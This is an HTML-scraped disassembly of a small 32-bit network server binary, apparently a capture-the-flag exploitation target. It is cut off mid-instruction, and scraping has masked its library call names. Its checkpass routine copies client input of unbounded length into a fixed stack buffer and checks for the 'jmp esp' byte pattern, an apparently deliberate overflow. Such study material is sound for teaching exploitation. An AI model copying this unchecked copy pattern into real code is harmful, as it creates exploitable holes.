class="code-line"span class="x" 80487dc: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"080487e0/span span class="p"lt;/spanspan class="nf"register_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487e0: b8 6c 91 04 08 mov eax,0x804916c/span/span span class="code-line"span class="x" 80487e5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ea: c1 f8 02 sar eax,0x2/span/span span class="code-line"span class="x" 80487ed: 89 c2 mov edx,eax/span/span span class="code-line"span class="x" 80487ef: c1 ea 1f shr edx,0x1f/span/span span class="code-line"span class="x" 80487f2: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80487f4: d1 f8 sar eax,1/span/span span class="code-line"span class="x" 80487f6: 75 02 jne 80487fa lt;register_tm_clones+0x1agt;/span/span span class="code-line"span class="x" 80487f8: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487fa: ba 00 00 00 00 mov edx,0x0/span/span span class="code-line"span class="x" 80487ff: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 8048801: 74 f5 je 80487f8 lt;register_tm_clones+0x18gt;/span/span span class="code-line"span class="x" 8048803: 55 push ebp/span/span span class="code-line"span class="x" 8048804: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048806: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048809: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804880d: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 8048814: ff d2 call edx/span/span span class="code-line"span class="x" 8048816: c9 leave /span/span span class="code-line"span class="x" 8048817: c3 ret /span/span span class="code-line"span class="x" 8048818: 90 nop/span/span span class="code-line"span class="x" 8048819: 8d b4 26 00 00 00 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048820/span span class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048820: 80 3d 6c 91 04 08 00 cmp BYTE PTR ds:0x804916c,0x0/span/span span class="code-line"span class="x" 8048827: 75 13 jne 804883c lt;__do_global_dtors_aux+0x1cgt;/span/span span class="code-line"span class="x" 8048829: 55 push ebp/span/span span class="code-line"span class="x" 804882a: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804882c: 83 ec 08 sub esp,0x8/span/span span class="code-line"span class="x" 804882f: e8 7c ff ff ff call 80487b0 lt;deregister_tm_clonesgt;/span/span span class="code-line"span class="x" 8048834: c6 05 6c 91 04 08 01 mov BYTE PTR ds:0x804916c,0x1/span/span span class="code-line"span class="x" 804883b: c9 leave /span/span span class="code-line"span class="x" 804883c: f3 c3 repz ret /span/span span class="code-line"span class="x" 804883e: 66 90 xchg ax,ax/span/span span class="code-line"/span span class="code-line"span class="mh"08048840/span span class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048840: a1 08 90 04 08 mov eax,ds:0x8049008/span/span span class="code-line"span class="x" 8048845: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048847: 74 1e je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048849: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 804884e: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048850: 74 15 je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048852: 55 push ebp/span/span span class="code-line"span class="x" 8048853: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048855: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048858: c7 04 24 08 90 04 08 mov DWORD PTR [esp],0x8049008/span/span span class="code-line"span class="x" 804885f: ff d0 call eax/span/span span class="code-line"span class="x" 8048861: c9 leave /span/span span class="code-line"span class="x" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="x" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"/span span class="code-line"span class="mh"0804886c/span span class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 804886c: 55 push ebp/span/span span class="code-line"span class="x" 804886d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804886f: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048872: 81 ec 40 04 00 00 sub esp,0x440/span/span span class="code-line"span class="x" 8048878: c7 44 24 08 00 00 00 mov DWORD PTR [esp+0x8],0x0/span/span span class="code-line"span class="x" 804887f: 00 /span/span span class="code-line"span class="x" 8048880: c7 44 24 04 01 00 00 mov DWORD PTR [esp+0x4],0x1/span/span span class="code-line"span class="x" 8048887: 00 /span/span span class="code-line"span class="x" 8048888: c7 04 24 02 00 00 00 mov DWORD PTR [esp],0x2/span/span span class="code-line"span class="x" 804888f: e8 cc fe ff ff call 8048760 lt;[email protected];/span/span span class="code-line"span class="x" 8048894: 89 84 24 3c 04 00 00 mov DWORD PTR [esp+0x43c],eax/span/span span class="code-line"span class="x" 804889b: c7 44 24 04 10 00 00 mov DWORD PTR [esp+0x4],0x10/span/span span class="code-line"span class="x" 80488a2: 00 /span/span span class="code-line"span class="x" 80488a3: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488aa: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80488ad: e8 8e fd ff ff call 8048640 lt;[email protected];/span/span span class="code-line"span class="x" 80488b2: 66 c7 84 24 20 04 00 mov WORD PTR [esp+0x420],0x2/span/span span class="code-line"span class="x" 80488b9: 00 02 00 /span/span span class="code-line"span class="x" 80488bc: c7 04 24 00 00 00 00 mov DWORD PTR [esp],0x0/span/span span class="code-line"span class="x" 80488c3: e8 68 fe ff ff call 8048730 lt;[email protected];/span/span span class="code-line"span class="x" 80488c8: 89 84 24 24 04 00 00 mov DWORD PTR [esp+0x424],eax/span/span span class="code-line"span class="x" 80488cf: c7 04 24 0f 27 00 00 mov DWORD PTR [esp],0x270f/span/span span class="code-line"span class="x" 80488d6: e8 a5 fd ff ff call 8048680 lt;[email protected];/span/span span class="code-line"span class="x" 80488db: 66 89 84 24 22 04 00 mov WORD PTR [esp+0x422],ax/span/span span class="code-line"span class="x" 80488e2: 00 /span/span span class="code-line"span class="x" 80488e3: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 80488ea: 00 /span/span span class="code-line"span class="x" 80488eb: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488f2: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80488f6: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 80488fd: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048900: e8 eb fd ff ff call 80486f0 lt;[email protected];/span/span span class="code-line"span class="x" 8048905: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 804890c: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 8048913: 00 /span/span span class="code-line"span class="x" 8048914: 74 20 je 8048936 lt;main+0xcagt;/span/span span class="code-line"span class="x" 8048916: c7 44 24 04 0f 27 00 mov DWORD PTR [esp+0x4],0x270f/span/span span class="code-line"span class="x" 804891d: 00 /span/span span class="code-line"span class="x" 804891e: c7 04 24 90 8d 04 08 mov DWORD PTR [esp],0x8048d90/span/span span class="code-line"span class="x" 8048925: e8 06 fd ff ff call 8048630 lt;[email protected];/span/span span class="code-line"span class="x" 804892a: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048931: e8 8a fd ff ff call 80486c0 lt;[email protected];/span/span span class="code-line"span class="x" 8048936: c7 44 24 04 00 04 00 mov DWORD PTR [esp+0x4],0x400/span/span span class="code-line"span class="x" 804893d: 00 /span/span span class="code-line"span class="x" 804893e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048945: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048948: e8 f3 fd ff ff call 8048740 lt;[email protected];/span/span span class="code-line"span class="x" 804894d: c7 84 24 0c 04 00 00 mov DWORD PTR [esp+0x40c],0x10/span/span span class="code-line"span class="x" 8048954: 10 00 00 00 /span/span span class="code-line"span class="x" 8048958: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804895f: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048963: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 804896a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804896e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048975: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048978: e8 13 fd ff ff call 8048690 lt;[email protected];/span/span span class="code-line"span class="x" 804897d: 89 84 24 34 04 00 00 mov DWORD PTR [esp+0x434],eax/span/span span class="code-line"span class="x" 8048984: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804898b: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 804898f: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 8048996: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 804899a: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 80489a1: 00 /span/span span class="code-line"span class="x" 80489a2: c7 44 24 08 e8 03 00 mov DWORD PTR [esp+0x8],0x3e8/span/span span class="code-line"span class="x" 80489a9: 00 /span/span span class="code-line"span class="x" 80489aa: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489ae: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80489b2: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 80489b9: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489bc: e8 9f fc ff ff call 8048660 lt;[email protected];/span/span span class="code-line"span class="x" 80489c1: 89 84 24 30 04 00 00 mov DWORD PTR [esp+0x430],eax/span/span span class="code-line"span class="x" 80489c8: 8d 54 24 24 lea edx,[esp+0x24]/span/span span class="code-line"span class="x" 80489cc: 8b 84 24 30 04 00 00 mov eax,DWORD PTR [esp+0x430]/span/span span class="code-line"span class="x" 80489d3: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80489d5: c6 00 00 mov BYTE PTR [eax],0x0/span/span span class="code-line"span class="x" 80489d8: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489dc: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489df: e8 a8 02 00 00 call 8048c8c lt;checkpassgt;/span/span span class="code-line"span class="x" 80489e4: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 80489eb: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 80489f2: 00 /span/span span class="code-line"span class="x" 80489f3: 0f 84 8c 00 00 00 je 8048a85 lt;main+0x219gt;/span/span span class="code-line"span class="x" 80489f9: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x5/span/span span class="code-line"span class="x" 8048a00: 05 /span/span span class="code-line"span class="x" 8048a01: 74 45 je 8048a48 lt;main+0x1dcgt;/span/span span class="code-line"span class="x" 8048a03: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048a07: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 8048a0b: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a12: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a16: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a1d: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a21: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a28: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a2c: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a33: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a37: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a3e: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a41: e8 41 01 00 00 call 8048b87 lt;senderrorgt;/span/span span class="code-line"span class="x" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a48: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a4f: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a53: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a5a: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a5e: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a65: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a69: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a70: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a74: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a7b: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a7e: e8 76 01 00 00 call 8048bf9 lt;sendtokengt;/span/span span class="code-line"span class="x" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a85: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a8c: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a90: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a97: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a9b: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048aa2: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048aa6: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048aad: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048ab1: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ab8: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048abb: e8 34 00 00 00 call 8048af4 lt;sendfilegt;/span/span span class="code-line"span class="x" 8048ac0: c7 04 24 b2 8d 04 08 mov DWORD PTR [esp],0x8048db2/span/span span class="code-line"span class="x" 8048ac7: e8 d4 fb ff ff call 80486a0 lt;[email protected];/span/span span class="code-line"span class="x" 8048acc: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048ad0: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048ad4: c7 04 24 ca 8d 04 08 mov DWORD PTR [esp],0x8048dca/span/span span class="code-line"span class="x" 8048adb: e8 50 fb ff ff call 8048630 lt;[email protected];/span/span span class="code-line"span class="x" 8048ae0: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ae7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048aea: e8 81 fc ff ff call 8048770 lt;[email protected];/span/span span class="code-line"span class="x" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048af4/span span class="p"lt;/spanspan class="nf"sendfile/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048af4: 55 push ebp/span/span span class="code-line"span class="x" 8048af5: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048af7: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048afa: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048b01: 08 /span/span span class="code-line"span class="x" 8048b02: c7 04 24 cf 8d 04 08 mov DWORD PTR [esp],0x8048dcf/span/span span class="code-line"span class="x" 8048b09: e8 f2 fb ff ff call 8048700 lt;[email protected];/span/span span class="code-line"span class="x" 8048b0e: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048b11: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048b15: 74 56 je 8048b6d lt;sendfile+0x79gt;/span/span span class="code-line"span class="x" 8048b17: eb 31 jmp 8048b4a lt;sendfile+0x56gt;/span/span span class="code-line"span class="x" 8048b19: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b20: 00 /span/span span class="code-line"span class="x" 8048b21: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b24: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b28: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048b2f: 00 /span/span span class="code-line"span class="x" 8048b30: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048b37: 00 /span/span span class="code-line"span class="x" 8048b38: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048b3b: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048b3f: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048b42: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b45: e8 d6 fb ff ff call 8048720 lt;[email protected];/span/span span class="code-line"span class="x" 8048b4a: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b4d: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b50: e8 1b fb ff ff call 8048670 lt;[email protected];/span/span span class="code-line"span class="x" 8048b55: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048b58: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048b5b: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048b5e: 75 b9 jne 8048b19 lt;sendfile+0x25gt;/span/span span class="code-line"span class="x" 8048b60: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048b63: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048b66: e8 e5 fa ff ff call 8048650 lt;[email protected];/span/span span class="code-line"span class="x" 8048b6b: eb 18 jmp 8048b85 lt;sendfile+0x91gt;/span/span span class="code-line"span class="x" 8048b6d: c7 04 24 dc 8d 04 08 mov DWORD PTR [esp],0x8048ddc/span/span span class="code-line"span class="x" 8048b74: e8 27 fb ff ff call 80486a0 lt;[email protected];/span/span span class="code-line"span class="x" 8048b79: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048b80: e8 3b fb ff ff call 80486c0 lt;[email protected];/span/span span class="code-line"span class="x" 8048b85: c9 leave /span/span span class="code-line"span class="x" 8048b86: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048b87/span span class="p"lt;/spanspan class="nf"senderror/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048b87: 55 push ebp/span/span span class="code-line"span class="x" 8048b88: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048b8a: 83 ec 28 sub esp,0x28/span/span span class="code-line"span class="x" 8048b8d: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048b94: 00 /span/span span class="code-line"span class="x" 8048b95: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048b98: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048b9c: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048ba3: 00 /span/span span class="code-line"span class="x" 8048ba4: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 8048bab: 00 /span/span span class="code-line"span class="x" 8048bac: c7 44 24 04 fb 8d 04 mov DWORD PTR [esp+0x4],0x8048dfb/span/span span class="code-line"span class="x" 8048bb3: 08 /span/span span class="code-line"span class="x" 8048bb4: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bb7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bba: e8 61 fb ff ff call 8048720 lt;[email protected];/span/span span class="code-line"span class="x" 8048bbf: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048bc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bc5: e8 06 fb ff ff call 80486d0 lt;[email protected];/span/span span class="code-line"span class="x" 8048bca: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048bd1: 00 /span/span span class="code-line"span class="x" 8048bd2: 8d 55 0c lea edx,[ebp+0xc]/span/span span class="code-line"span class="x" 8048bd5: 89 54 24 10 mov DWORD PTR [esp+0x10],edx/span/span span class="code-line"span class="x" 8048bd9: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048be0: 00 /span/span span class="code-line"span class="x" 8048be1: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048be5: 8b 45 1c mov eax,DWORD PTR [ebp+0x1c]/span/span span class="code-line"span class="x" 8048be8: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048bec: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048bef: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048bf2: e8 29 fb ff ff call 8048720 lt;[email protected];/span/span span class="code-line"span class="x" 8048bf7: c9 leave /span/span span class="code-line"span class="x" 8048bf8: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048bf9/span span class="p"lt;/spanspan class="nf"sendtoken/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048bf9: 55 push ebp/span/span span class="code-line"span class="x" 8048bfa: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048bfc: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048bff: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048c06: 08 /span/span span class="code-line"span class="x" 8048c07: c7 04 24 0c 8e 04 08 mov DWORD PTR [esp],0x8048e0c/span/span span class="code-line"span class="x" 8048c0e: e8 ed fa ff ff call 8048700 lt;[email protected];/span/span span class="code-line"span class="x" 8048c13: 89 45 f4 mov DWORD PTR [ebp-0xc],eax/span/span span class="code-line"span class="x" 8048c16: 83 7d f4 00 cmp DWORD PTR [ebp-0xc],0x0/span/span span class="code-line"span class="x" 8048c1a: 74 56 je 8048c72 lt;sendtoken+0x79gt;/span/span span class="code-line"span class="x" 8048c1c: eb 31 jmp 8048c4f lt;sendtoken+0x56gt;/span/span span class="code-line"span class="x" 8048c1e: c7 44 24 14 10 00 00 mov DWORD PTR [esp+0x14],0x10/span/span span class="code-line"span class="x" 8048c25: 00 /span/span span class="code-line"span class="x" 8048c26: 8d 45 0c lea eax,[ebp+0xc]/span/span span class="code-line"span class="x" 8048c29: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048c2d: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 8048c34: 00 /span/span span class="code-line"span class="x" 8048c35: c7 44 24 08 01 00 00 mov DWORD PTR [esp+0x8],0x1/span/span span class="code-line"span class="x" 8048c3c: 00 /span/span span class="code-line"span class="x" 8048c3d: 8d 45 f0 lea eax,[ebp-0x10]/span/span span class="code-line"span class="x" 8048c40: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048c44: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c47: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c4a: e8 d1 fa ff ff call 8048720 lt;[email protected];/span/span span class="code-line"span class="x" 8048c4f: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c52: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c55: e8 16 fa ff ff call 8048670 lt;[email protected];/span/span span class="code-line"span class="x" 8048c5a: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048c5d: 8b 45 f0 mov eax,DWORD PTR [ebp-0x10]/span/span span class="code-line"span class="x" 8048c60: 83 f8 ff cmp eax,0xffffffff/span/span span class="code-line"span class="x" 8048c63: 75 b9 jne 8048c1e lt;sendtoken+0x25gt;/span/span span class="code-line"span class="x" 8048c65: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]/span/span span class="code-line"span class="x" 8048c68: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c6b: e8 e0 f9 ff ff call 8048650 lt;[email protected];/span/span span class="code-line"span class="x" 8048c70: eb 18 jmp 8048c8a lt;sendtoken+0x91gt;/span/span span class="code-line"span class="x" 8048c72: c7 04 24 12 8e 04 08 mov DWORD PTR [esp],0x8048e12/span/span span class="code-line"span class="x" 8048c79: e8 22 fa ff ff call 80486a0 lt;[email protected];/span/span span class="code-line"span class="x" 8048c7e: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048c85: e8 36 fa ff ff call 80486c0 lt;[email protected];/span/span span class="code-line"span class="x" 8048c8a: c9 leave /span/span span class="code-line"span class="x" 8048c8b: c3 ret /span/span span class="code-line"/span span class="code-line"span class="mh"08048c8c/span span class="p"lt;/spanspan class="nf"checkpass/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048c8c: 55 push ebp/span/span span class="code-line"span class="x" 8048c8d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048c8f: 81 ec 28 02 00 00 sub esp,0x228/span/span span class="code-line"span class="x" 8048c95: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048c98: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048c9b: e8 30 fa ff ff call 80486d0 lt;[email protected];/span/span span class="code-line"span class="x" 8048ca0: 83 c0 01 add eax,0x1/span/span span class="code-line"span class="x" 8048ca3: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048ca7: 8b 45 08 mov eax,DWORD PTR [ebp+0x8]/span/span span class="code-line"span class="x" 8048caa: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048cae: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cb4: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cb7: e8 54 fa ff ff call 8048710 lt;[email protected];/span/span span class="code-line"span class="x" 8048cbc: 8d 85 f0 fd ff ff lea eax,[ebp-0x210]/span/span span class="code-line"span class="x" 8048cc2: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048cc5: e8 86 fa ff ff call 8048750 lt;[email protected]tgt;/span/span span class="code-line"span class="x" 8048cca: 89 45 f0 mov DWORD PTR [ebp-0x10],eax/span/span span class="code-line"span class="x" 8048ccd: 81 7d f0 ff e4 00 00 cmp DWORD PTR [ebp-0x10],0xe4ff/span/span span class="code-line"span class="x" 8048cd4: 75 09 jne 8048cdf lt;checkpass+0x53gt;/span/span span class="code-line"span class="x" 8048cd6: c7 45 f4 05 00 00 00 